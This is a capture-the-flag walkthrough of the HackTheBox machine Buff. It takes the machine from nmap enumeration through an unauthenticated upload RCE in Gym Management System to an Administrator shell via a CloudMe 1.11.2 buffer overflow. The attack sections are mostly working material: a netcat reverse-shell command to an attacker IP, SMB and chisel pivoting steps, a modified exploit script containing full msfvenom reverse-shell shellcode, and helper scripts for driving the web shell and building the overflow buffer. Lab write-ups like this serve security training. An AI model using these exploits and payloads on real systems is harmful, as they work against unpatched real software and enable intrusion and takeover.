This post is a walkthrough of the HackTheBox machine Buff.
Hackthebox Buff Walkthrough

Initial Enumeration
Port Scan
# Nmap 7.91 scan initiated Tue Feb 22 20:35:04 2022 as: nmap -sT -p- -min-rate 10000 -Pn -oN alltcp.txt 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.068s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
7680/tcp open pando-pub
8080/tcp open http-proxy
# Nmap done at Tue Feb 22 20:35:23 2022 -- 1 IP address (1 host up) scanned in 19.00 seconds

Only two TCP ports are open. Port 8080 serves what looks like a fitness club website.

Directory Enumeration
gobuster dir -u http://10.10.10.198:8080 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.198:8080
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/02/22 20:52:06 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 1044]
/.htaccess (Status: 403) [Size: 1044]
/.hta (Status: 403) [Size: 1044]
/admin.pl (Status: 403) [Size: 1044]
/admin.cgi (Status: 403) [Size: 1044]
/AT-admin.cgi (Status: 403) [Size: 1044]
/aux (Status: 403) [Size: 1044]
/boot (Status: 301) [Size: 342] [--> http://10.10.10.198:8080/boot/]
/cachemgr.cgi (Status: 403) [Size: 1044]
/cgi-bin/ (Status: 403) [Size: 1058]
/com3 (Status: 403) [Size: 1044]
/com1 (Status: 403) [Size: 1044]
/com2 (Status: 403) [Size: 1044]
/con (Status: 403) [Size: 1044]
/ex (Status: 301) [Size: 340] [--> http://10.10.10.198:8080/ex/]
/examples (Status: 503) [Size: 1058]
/img (Status: 301) [Size: 341] [--> http://10.10.10.198:8080/img/]
/include (Status: 301) [Size: 345] [--> http://10.10.10.198:8080/include/]
/index.php (Status: 200) [Size: 4969]
/LICENSE (Status: 200) [Size: 18025]
/license (Status: 200) [Size: 18025]
/licenses (Status: 403) [Size: 1203]
/lpt2 (Status: 403) [Size: 1044]
/lpt1 (Status: 403) [Size: 1044]
/nul (Status: 403) [Size: 1044]
/phpmyadmin (Status: 403) [Size: 1203]
/prn (Status: 403) [Size: 1044]
/profile (Status: 301) [Size: 345] [--> http://10.10.10.198:8080/profile/]
/server-status (Status: 403) [Size: 1203]
/server-info (Status: 403) [Size: 1203]
/upload (Status: 301) [Size: 344] [--> http://10.10.10.198:8080/upload/]
/webalizer (Status: 403) [Size: 1044]
The site is Gym Management Software, and searchsploit has an entry for it: Gym Management System 1.0 - Unauthenticated Remote Code Execution (48506.py), which abuses an unauthenticated file upload in upload.php to drop a web shell.

The first run fails with InvalidURL: the script builds its upload URL by plain string concatenation, so the base URL must end with a trailing slash (note the missing / in http://10.10.10.198:8080upload.php in the traceback). The second run, with the slash, connects to the web shell.
└─$ python2 48506.py http://10.10.10.198:8080
Traceback (most recent call last):
File "48506.py", line 102, in <module>
r1 = s.post(url=UPLOAD_URL, files=png, data=fdata, verify=False)
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 578, in post
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 516, in request
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/sessions.py", line 459, in prepare_request
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/models.py", line 314, in prepare
File "/usr/share/offsec-awae-wheels/requests-2.23.0-py2.py3-none-any.whl/requests/models.py", line 382, in prepare_url
requests.exceptions.InvalidURL: Failed to parse: http://10.10.10.198:8080upload.php?id=kamehameha
┌──(rocky㉿kali)-[~/hckbox/buff]
└─$ python2 48506.py http://10.10.10.198:8080/
[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG
▒
buff\shaun
This is not a proper reverse shell and gets annoying quickly: the exploit uploads a PHP file that starts with the PNG signature (to get past the image check), so the server returns those bytes (\x89PNG\r\n\x1a\n) before the output of every command.
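A small client for the uploaded web shell, added here as an example (it is not part of the post nor of 48506.py): it builds the upload URL so a missing trailing slash cannot break it, and strips the PNG signature from every response before printing. The name of the GET parameter the shell reads is not shown in the post, so it is passed in as an argument rather than assumed.

```python
"""Helper for driving the PNG-prefixed web shell left by 48506.py (added example)."""
import sys
from urllib.parse import urlencode, urljoin
from urllib.request import urlopen

# The exploit uploads a PHP file that starts with the PNG signature so it
# passes the upload's image check; the server echoes that signature before
# every command's output, which is the "PNG" garbage seen in the session above.
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def upload_url(base, path="upload.php?id=kamehameha"):
    """Build the upload URL the way the PoC should have: tolerate a base URL
    with or without a trailing slash instead of plain string concatenation."""
    if not base.endswith("/"):
        base += "/"
    return urljoin(base, path)


def strip_png(body):
    """Drop the leading PNG signature and return the command output as text."""
    if body.startswith(PNG_SIGNATURE):
        body = body[len(PNG_SIGNATURE):]
    return body.decode("utf-8", errors="replace").strip()


def run_command(shell_url, param, cmd, timeout=10):
    """Send cmd to the web shell via GET parameter `param` (the parameter name
    is an assumption: pass whatever the uploaded shell reads) and return the
    cleaned output."""
    with urlopen(shell_url + "?" + urlencode({param: cmd}), timeout=timeout) as resp:
        return strip_png(resp.read())


if __name__ == "__main__":
    # usage: python webshell.py http://10.10.10.198:8080/upload/<shell>.php <param>
    url, param = sys.argv[1], sys.argv[2]
    for line in sys.stdin:
        print(run_command(url, param, line.strip()))
```

Pipe commands into it one per line; each answer comes back without the leading PNG bytes, which makes the output readable until a real reverse shell is in place.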

Output of systeminfo from the web shell:
Host Name: BUFF
OS Name: Microsoft Windows 10 Enterprise
OS Version: 10.0.17134 N/A Build 17134
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: shaun
Registered Organization:
Product ID: 00329-10280-00000-AA218
Original Install Date: 16/06/2020, 14:05:58
System Boot Time: 23/02/2022, 01:12:36
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
[02]: AMD64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 07/08/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume2
System Locale: en-us;English (United States)
Input Locale: en-gb;English (United Kingdom)
Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,464 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 2,690 MB
Virtual Memory: In Use: 2,109 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.198
[02]: fe80::cc01:2a17:73b0:b5d0
[03]: dead:beef::95d1:120d:7d7a:6105
[04]: dead:beef::cc01:2a17:73b0:b5d0
[05]: dead:beef::241
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Let's upgrade to a proper reverse shell by pushing nc.exe to the box over SMB.
locate nc.exe
/home/rocky/hckbox/Bastard/nc.exe
/home/rocky/hckbox/irked/nc.exe
/home/rocky/hckbox/optimum/nc.exe
/home/rocky/thm/Corp/nc.exe
/home/rocky/thm/alfred/nc.exe
/home/rocky/tool/exp/nc.exe
/home/rocky/tool/exp/enum/Windows/nc.exe
/home/rocky/tool/exp/windows/nc.exe
/home/rocky/wordlist/SecLists/Web-Shells/FuzzDB/nc.exe
/usr/share/SecLists-master/Web-Shells/FuzzDB/nc.exe
/usr/share/windows-resources/binaries/nc.exe
┌──(rocky㉿kali)-[~/hckbox/buff]
└─$ cp /usr/share/windows-resources/binaries/nc.exe .
┌──(rocky㉿kali)-[~/hckbox/buff]
└─$
┌──(rocky㉿kali)-[~/hckbox/buff]
└─$ ls
48506.py alltcp.txt alludp.txt detailed.txt nc.exe systeminfo-buff.txt
┌──(rocky㉿kali)-[~/hckbox/buff]
└─$ impacket-smbserver smb .
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
From the web shell, try to pull nc.exe from the share.
C:\xampp\htdocs\gym\upload> net use \\10.10.14.12\smb
�PNG
▒
C:\xampp\htdocs\gym\upload> copy \\10.10.14.12\smb\nc.exe nc.exe
�PNG
▒
You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
Windows 10 refuses SMB1, and unauthenticated guest access to SMB shares is disabled by default, so the Impacket server needs -smb2support plus a username and password. Restart it on Kali:
┌──(rocky㉿kali)-[~/hckbox/buff]
└─$ impacket-smbserver smb . -smb2support -username df -password df
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Commands on the Windows (victim) machine:
C:\xampp\htdocs\gym\upload> net use \\10.10.14.12\smb /u:df df
�PNG
▒
The command completed successfully.
C:\xampp\htdocs\gym\upload> copy \\10.10.14.12\smb\nc.exe nc.exe
�PNG
▒
1 file(s) copied.
C:\xampp\htdocs\gym\upload> nc.exe -e cmd 10.10.14.12 8989
On Kali, with the listener started before nc.exe is launched on Buff:
┌──(rocky㉿kali)-[~]
└─$ rlwrap nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.198] 49992
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
whoami
whoami
buff\shaun
C:\xampp\htdocs\gym\upload>

Before running any enumeration scripts I checked the user's privileges (nothing interesting) and the listening ports. Two services are bound to localhost only: 3306 (MySQL, from XAMPP) and 8888.
netstat -ano | findstr TCP | findstr ":0"
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 936
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING 5948
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING 1616
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING 6104
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 520
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1092
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1588
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 2164
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 668
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 680
TCP 10.10.10.198:139 0.0.0.0:0 LISTENING 4
TCP 127.0.0.1:3306 0.0.0.0:0 LISTENING 8112
TCP 127.0.0.1:8888 0.0.0.0:0 LISTENING 5064
TCP [::]:135 [::]:0 LISTENING 936
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:7680 [::]:0 LISTENING 1616
TCP [::]:8080 [::]:0 LISTENING 6104
TCP [::]:49664 [::]:0 LISTENING 520
TCP [::]:49665 [::]:0 LISTENING 1092
TCP [::]:49666 [::]:0 LISTENING 1588
TCP [::]:49667 [::]:0 LISTENING 2164
TCP [::]:49668 [::]:0 LISTENING 668
TCP [::]:49669 [::]:0 LISTENING 680
c:\Users\shaun\temp>
Mapping PID 5064 (the owner of port 8888 above) with "tasklist /v | findstr 5064" shows the process behind it; be quick, because the process restarts and its PID changes. The installer for that program sits in shaun's Downloads folder:
Directory of c:\Users\shaun\Downloads
14/07/2020 12:27 <DIR> .
14/07/2020 12:27 <DIR> ..
16/06/2020 15:26 17,830,824 CloudMe_1112.exe
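The comparison done by hand above (netstat on the box versus the nmap scan from outside) is easy to automate. The following is an added example, not code from the post: it parses netstat -ano output, splits listening ports into those bound only to loopback (need a port forward), those bound to a routable address but not seen by nmap (blocked by the host firewall), and those reachable, and prints the chisel client argument for each loopback-only port. The sample lines are copied from the netstat output above, except the [::1]:9999 line, which is constructed to show IPv6 loopback handling; the chisel server port 8000 and attacker IP 10.10.14.12 are taken from later in the post.

```python
"""Classify netstat -ano listeners against what nmap saw from outside (added example)."""
import re
from ipaddress import ip_address

# Listening lines copied from the netstat output in the post; the [::1]:9999
# line is constructed to show that IPv6 loopback is handled too.
NETSTAT_SAMPLE = """\
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       936
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       1616
  TCP    0.0.0.0:8080           0.0.0.0:0              LISTENING       6104
  TCP    10.10.10.198:139       0.0.0.0:0              LISTENING       4
  TCP    127.0.0.1:3306         0.0.0.0:0              LISTENING       8112
  TCP    127.0.0.1:8888         0.0.0.0:0              LISTENING       5064
  TCP    [::]:135               [::]:0                 LISTENING       936
  TCP    [::]:445               [::]:0                 LISTENING       4
  TCP    [::1]:9999             [::]:0                 LISTENING       4242
"""

# Ports the full-range nmap scan reported open from the attacker's side.
NMAP_OPEN = {7680, 8080}

LISTEN_RE = re.compile(r"^\s*TCP\s+(\S+)\s+\S+\s+LISTENING\s+(\d+)\s*$")


def parse_listeners(netstat_text):
    """Yield (ip_address, port, pid) for each LISTENING TCP line."""
    for line in netstat_text.splitlines():
        m = LISTEN_RE.match(line)
        if not m:
            continue
        addr, port = m.group(1).rsplit(":", 1)   # "[::]:135" -> "[::]", "135"
        yield ip_address(addr.strip("[]")), int(port), int(m.group(2))


def classify_listeners(netstat_text, externally_open):
    """Split listening ports into three buckets:
       loopback_only - bound to 127.0.0.1/::1 only: needs a port forward (chisel)
       firewalled    - bound to a routable/wildcard address but not seen by nmap
       reachable     - bound to a routable address and seen by nmap"""
    addrs, pids = {}, {}
    for addr, port, pid in parse_listeners(netstat_text):
        addrs.setdefault(port, set()).add(addr)
        pids.setdefault(port, pid)
    buckets = {"loopback_only": {}, "firewalled": {}, "reachable": {}}
    for port, bound in addrs.items():
        if all(a.is_loopback for a in bound):
            buckets["loopback_only"][port] = pids[port]
        elif port in externally_open:
            buckets["reachable"][port] = pids[port]
        else:
            buckets["firewalled"][port] = pids[port]
    return buckets


def chisel_client_args(port, attacker_ip, server_port=8000):
    """Reverse-forward argument for chisel: listen on the attacker at `port`
    and relay each connection to 127.0.0.1:`port` on the victim."""
    return f"client {attacker_ip}:{server_port} R:{port}:127.0.0.1:{port}"


if __name__ == "__main__":
    result = classify_listeners(NETSTAT_SAMPLE, NMAP_OPEN)
    for bucket, ports in result.items():
        print(bucket, dict(sorted(ports.items())))
    for port in sorted(result["loopback_only"]):
        print("chisel", chisel_client_args(port, "10.10.14.12"))
```

The firewalled bucket is worth a look too: 135, 139 and 445 listen on every interface but were filtered in the nmap scan, which tells you a host firewall is in play even before you find the loopback-only CloudMe port.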
Port Forwarding
CloudMe (version 1.11.2, going by the installer name) is the service listening on 8888, and there are public buffer-overflow exploits for it:
searchsploit cloudme
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
CloudMe 1.11.2 - Buffer Overflow (PoC) | windows/remote/48389.py
CloudMe 1.11.2 - Buffer Overflow (SEH_DEP_ASLR) | windows/local/48499.txt
CloudMe 1.11.2 - Buffer Overflow ROP (DEP_ASLR) | windows/local/48840.py
Cloudme 1.9 - Buffer Overflow (DEP) (Metasploit) | windows_x86-64/remote/45197.rb
CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass) | windows_x86-64/local/45159.py
CloudMe Sync 1.10.9 - Stack-Based Buffer Overflow (Metasploit) | windows/remote/44175.rb
CloudMe Sync 1.11.0 - Local Buffer Overflow | windows/local/44470.py
CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt | windows/remote/46218.py
CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass) | windows_x86-64/remote/46250.py
CloudMe Sync < 1.11.0 - Buffer Overflow | windows/remote/44027.py
CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) | windows_x86-64/remote/44784.py
To use any of these the service has to be reachable from the attacker, but CloudMe binds to 127.0.0.1 only, so port forwarding is needed. The tool used here is chisel (https://github.com/jpillora/chisel); grab the release binaries for both Linux (attacker side) and Windows (victim side):
ls -al
total 23732
drwxr-xr-x 2 rocky rocky 4096 Feb 23 01:20 .
drwxr-xr-x 21 rocky rocky 4096 Feb 23 01:16 ..
-rw-r--r-- 1 rocky rocky 8077312 Jan 30 21:36 chisel_1.7.7_linux_amd64
-rw-r--r-- 1 rocky rocky 8230912 Jan 30 21:36 chisel_1.7.7_windows_amd64
-rw-r--r-- 1 rocky rocky 7981056 Jan 30 21:36 chisel_1.7.7_windows_arm64
┌──(rocky㉿kali)-[~/tool/exp/chisel]
└─$ impacket-smbserver smb . -smb2support -username df -password df
Impacket v0.9.25.dev1+20220218.140931.6042675a - Copyright 2021 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
In the reverse shell on Buff, copy the Windows binary into a working directory:
Directory of c:\Users\shaun\temp
23/02/2022 05:21 <DIR> .
23/02/2022 05:21 <DIR> ..
0 File(s) 0 bytes
2 Dir(s) 9,817,460,736 bytes free
net use \\10.10.14.12\smb /u:df df
The command completed successfully.
copy \\10.10.14.12\smb\chisel_1.7.7_windows_amd64 exp.exe
1 file(s) copied.
dir
Volume in drive C has no label.
Volume Serial Number is A22D-49F7
Directory of c:\Users\shaun\temp
23/02/2022 06:23 <DIR> .
23/02/2022 06:23 <DIR> ..
31/01/2022 02:36 8,230,912 exp.exe
1 File(s) 8,230,912 bytes
2 Dir(s) 9,809,203,200 bytes free
net use /d \\10.10.14.12\smb
\\10.10.14.12\smb was deleted successfully.
On Kali, run chisel in server mode with reverse tunnelling enabled:
┌──(rocky㉿kali)-[~/tool/exp/chisel]
└─$ sudo ./chisel_1.7.7_linux_amd64 -h
Usage: chisel [command] [--help]
Version: 1.7.7 (go1.17.6)
Commands:
server - runs chisel in server mode
client - runs chisel in client mode
Read more:
https://github.com/jpillora/chisel
┌──(rocky㉿kali)-[~/tool/exp/chisel]
└─$ ./chisel_1.7.7_linux_amd64 server -p 8000 --reverse
2022/02/23 01:31:30 server: Reverse tunnelling enabled
2022/02/23 01:31:30 server: Fingerprint 5NdnDwnH2MLCfTDIQ5GcZMrw83etSLTjaAHTVBbs2+k=
2022/02/23 01:31:30 server: Listening on http://0.0.0.0:8000
On Buff, run the client. R:8888:localhost:8888 asks the server to listen on port 8888 on Kali and relay every connection back through the tunnel to localhost:8888 on Buff, where CloudMe is listening:
c:\Users\shaun\temp>
.\exp.exe client 10.10.14.12:8000 R:8888:localhost:8888
2022/02/23 06:33:48 client: Connecting to ws://10.10.14.12:8000
2022/02/23 06:33:48 client: Connected (Latency 59.6776ms)
The server end confirms the session and the new listener:
─$ ./chisel_1.7.7_linux_amd64 server -p 8000 --reverse
2022/02/23 01:31:30 server: Reverse tunnelling enabled
2022/02/23 01:31:30 server: Fingerprint 5NdnDwnH2MLCfTDIQ5GcZMrw83etSLTjaAHTVBbs2+k=
2022/02/23 01:31:30 server: Listening on http://0.0.0.0:8000
2022/02/23 01:33:40 server: session#1: tun: proxy#R:8888=>localhost:8888: Listening
netstat on Kali confirms chisel is now listening on 8888 (and on 8000 for the tunnel itself):
(rocky㉿kali)-[~]
└─$ netstat -ntlp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp6 0 0 :::8000 :::* LISTEN 4274/./chisel_1.7.7
tcp6 0 0 :::8888 :::* LISTEN 4274/./chisel_1.7.7
Now let's use the PoC found earlier, CloudMe 1.11.2 - Buffer Overflow (PoC), 48389.py:
┌──(rocky㉿kali)-[~]
└─$ cd ~/hckbox/buff
┌──(rocky㉿kali)-[~/hckbox/buff]
└─$ locate 48389.py
/usr/share/exploitdb/exploits/windows/remote/48389.py
┌──(rocky㉿kali)-[~/hckbox/buff]
└─$ cp /usr/share/exploitdb/exploits/windows/remote/48389.py .
┌──(rocky㉿kali)-[~/hckbox/buff]
└─$ cat 48389.py
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
import socket
target = "127.0.0.1"
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
#msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
payload = b"\xba\xad\x1e\x7c\x02\xdb\xcf\xd9\x74\x24\xf4\x5e\x33"
payload += b"\xc9\xb1\x31\x83\xc6\x04\x31\x56\x0f\x03\x56\xa2\xfc"
The PoC needs a few changes before it is useful here. The target stays 127.0.0.1, because through the chisel forward port 8888 on Kali is CloudMe on Buff. The calc.exe payload has to be swapped for a reverse shell generated with the same bad characters, for example msfvenom -p windows/shell_reverse_tcp LHOST=<kali ip> LPORT=<port> -b '\x00\x0A\x0D' -f python (LHOST and LPORT are placeholders; the post does not show the listener port). The except clause is also broken as written: sys is never imported and sys.exc_value only exists in Python 2, so just print the caught exception. The original is kept as 48389.py.old and the modified script follows.

└─$ ls
48389.py 48389.py.old 48506.py alltcp.txt alludp.txt detailed.txt nc.exe systeminfo-buff.txt
┌──(rocky㉿kali)-[~/hckbox/buff]
└─$ python 48389.py
┌──(rocky㉿kali)-[~/hckbox/buff]
└─$ cat 48389.py
# Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
# Date: 2020-04-27
# Exploit Author: Andy Bowden
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Version: CloudMe 1.11.2
# Tested on: Windows 10 x86
#Instructions:
# Start the CloudMe service and run the script.
import socket
target = "127.0.0.1"  # Kali side of the chisel forward (R:8888:localhost:8888)
padding1 = b"\x90" * 1052
EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
NOPS = b"\x90" * 30
# Original PoC payload was windows/exec CMD=calc.exe; replaced with a reverse shell:
# msfvenom -p windows/shell_reverse_tcp LHOST=<kali ip> LPORT=<port> -b '\x00\x0A\x0D' -f python
payload = b""
payload += b"\xda\xde\xbe\x92\x89\x16\x17\xd9\x74\x24\xf4\x5b"
payload += b"\x2b\xc9\xb1\x52\x31\x73\x17\x03\x73\x17\x83\x51"
payload += b"\x8d\xf4\xe2\xa9\x66\x7a\x0c\x51\x77\x1b\x84\xb4"
payload += b"\x46\x1b\xf2\xbd\xf9\xab\x70\x93\xf5\x40\xd4\x07"
payload += b"\x8d\x25\xf1\x28\x26\x83\x27\x07\xb7\xb8\x14\x06"
payload += b"\x3b\xc3\x48\xe8\x02\x0c\x9d\xe9\x43\x71\x6c\xbb"
payload += b"\x1c\xfd\xc3\x2b\x28\x4b\xd8\xc0\x62\x5d\x58\x35"
payload += b"\x32\x5c\x49\xe8\x48\x07\x49\x0b\x9c\x33\xc0\x13"
payload += b"\xc1\x7e\x9a\xa8\x31\xf4\x1d\x78\x08\xf5\xb2\x45"
payload += b"\xa4\x04\xca\x82\x03\xf7\xb9\xfa\x77\x8a\xb9\x39"
payload += b"\x05\x50\x4f\xd9\xad\x13\xf7\x05\x4f\xf7\x6e\xce"
payload += b"\x43\xbc\xe5\x88\x47\x43\x29\xa3\x7c\xc8\xcc\x63"
payload += b"\xf5\x8a\xea\xa7\x5d\x48\x92\xfe\x3b\x3f\xab\xe0"
payload += b"\xe3\xe0\x09\x6b\x09\xf4\x23\x36\x46\x39\x0e\xc8"
payload += b"\x96\x55\x19\xbb\xa4\xfa\xb1\x53\x85\x73\x1c\xa4"
payload += b"\xea\xa9\xd8\x3a\x15\x52\x19\x13\xd2\x06\x49\x0b"
payload += b"\xf3\x26\x02\xcb\xfc\xf2\x85\x9b\x52\xad\x65\x4b"
payload += b"\x13\x1d\x0e\x81\x9c\x42\x2e\xaa\x76\xeb\xc5\x51"
payload += b"\x11\x1e\x10\x57\xed\x76\x26\x67\xf8\x35\xaf\x81"
payload += b"\x68\x2a\xe6\x1a\x05\xd3\xa3\xd0\xb4\x1c\x7e\x9d"
payload += b"\xf7\x97\x8d\x62\xb9\x5f\xfb\x70\x2e\x90\xb6\x2a"
payload += b"\xf9\xaf\x6c\x42\x65\x3d\xeb\x92\xe0\x5e\xa4\xc5"
payload += b"\xa5\x91\xbd\x83\x5b\x8b\x17\xb1\xa1\x4d\x5f\x71"
payload += b"\x7e\xae\x5e\x78\xf3\x8a\x44\x6a\xcd\x13\xc1\xde"
payload += b"\x81\x45\x9f\x88\x67\x3c\x51\x62\x3e\x93\x3b\xe2"
payload += b"\xc7\xdf\xfb\x74\xc8\x35\x8a\x98\x79\xe0\xcb\xa7"
payload += b"\xb6\x64\xdc\xd0\xaa\x14\x23\x0b\x6f\x24\x6e\x11"
payload += b"\xc6\xad\x37\xc0\x5a\xb0\xc7\x3f\x98\xcd\x4b\xb5"
payload += b"\x61\x2a\x53\xbc\x64\x76\xd3\x2d\x15\xe7\xb6\x51"
payload += b"\x8a\x08\x93"
# Pad the whole buffer out to 1500 bytes
overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
buf = padding1 + EIP + NOPS + payload + overrun
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, 8888))
    s.send(buf)
except Exception as e:
    print(e)  # sys.exc_value is Python 2 only; print the caught exception instead
With an nc listener waiting on the LPORT baked into the payload, running the script crashes CloudMe and the shell comes back. CloudMe runs as Administrator on this box, so the reverse shell is an Administrator shell.
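To make those edits safer, here is an added helper (my code, neither Andy Bowden's PoC nor part of the post) that assembles the same padding | EIP | NOP sled | payload | filler layout as 48389.py, rejects payloads that contain the bad characters or overflow the 1500-byte frame (the PoC's filler arithmetic silently goes negative in that case, so the buffer grows and the crash layout changes), and reports where EIP lands so it can be checked against the known offset. The INT3 placeholder payload, the 127.0.0.1:8888 target through the chisel forward and the --send flag are assumptions.

```python
"""Build and sanity-check the CloudMe 1.11.2 overflow buffer before sending it (added example)."""
import socket
import sys

# Layout constants taken from 48389.py
OFFSET = 1052                   # bytes of padding before the saved return address
EIP = b"\xB5\x42\xA8\x68"       # 0x68A842B5 -> PUSH ESP; RET
NOP_SLED = b"\x90" * 30
TOTAL_LEN = 1500                # size of the buffer the PoC sends
BAD_CHARS = b"\x00\x0a\x0d"     # excluded when the payload is generated with msfvenom


def check_payload(payload):
    """Refuse payloads containing bytes the target mangles."""
    found = sorted({b for b in payload if b in BAD_CHARS})
    if found:
        raise ValueError("bad chars in payload: " + ", ".join(f"0x{b:02x}" for b in found))


def build_buffer(payload, offset=OFFSET, eip=EIP, nops=NOP_SLED, total_len=TOTAL_LEN):
    """padding | EIP | NOP sled | payload | filler, padded to exactly total_len.

    The PoC computes the filler as b"C" * (1500 - len(...)); with a payload that
    is too big that count goes negative and silently yields b"", so the buffer
    ends up longer than 1500 bytes.  Fail loudly instead."""
    check_payload(payload)
    body = b"\x90" * offset + eip + nops + payload
    if len(body) > total_len:
        raise ValueError(f"payload too large: {len(body)} bytes, limit {total_len}")
    return body + b"C" * (total_len - len(body))


def describe(buf, offset=OFFSET, eip=EIP):
    """Report where the return address lands so it can be checked against the crash offset."""
    return {
        "eip_at": buf.find(eip),
        "eip_ok": buf[offset:offset + len(eip)] == eip,
        "length": len(buf),
    }


def send_buffer(buf, target="127.0.0.1", port=8888):
    """Deliver the buffer to CloudMe through the chisel forward (127.0.0.1:8888 on Kali).
    The nc listener for the reverse-shell payload must already be running."""
    with socket.create_connection((target, port), timeout=10) as s:
        s.sendall(buf)


if __name__ == "__main__":
    # Placeholder payload (assumption): four INT3s, which only crash CloudMe.
    # Replace with the msfvenom reverse-shell bytes before using --send.
    payload = b"\xcc" * 4
    buf = build_buffer(payload)
    print(describe(buf))
    if "--send" in sys.argv:
        send_buffer(buf)
```

Run it without --send first: if eip_ok is False or the length is not 1500, the modified script will not land where the PoC author's crash analysis expects.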
Take-Away from this Box
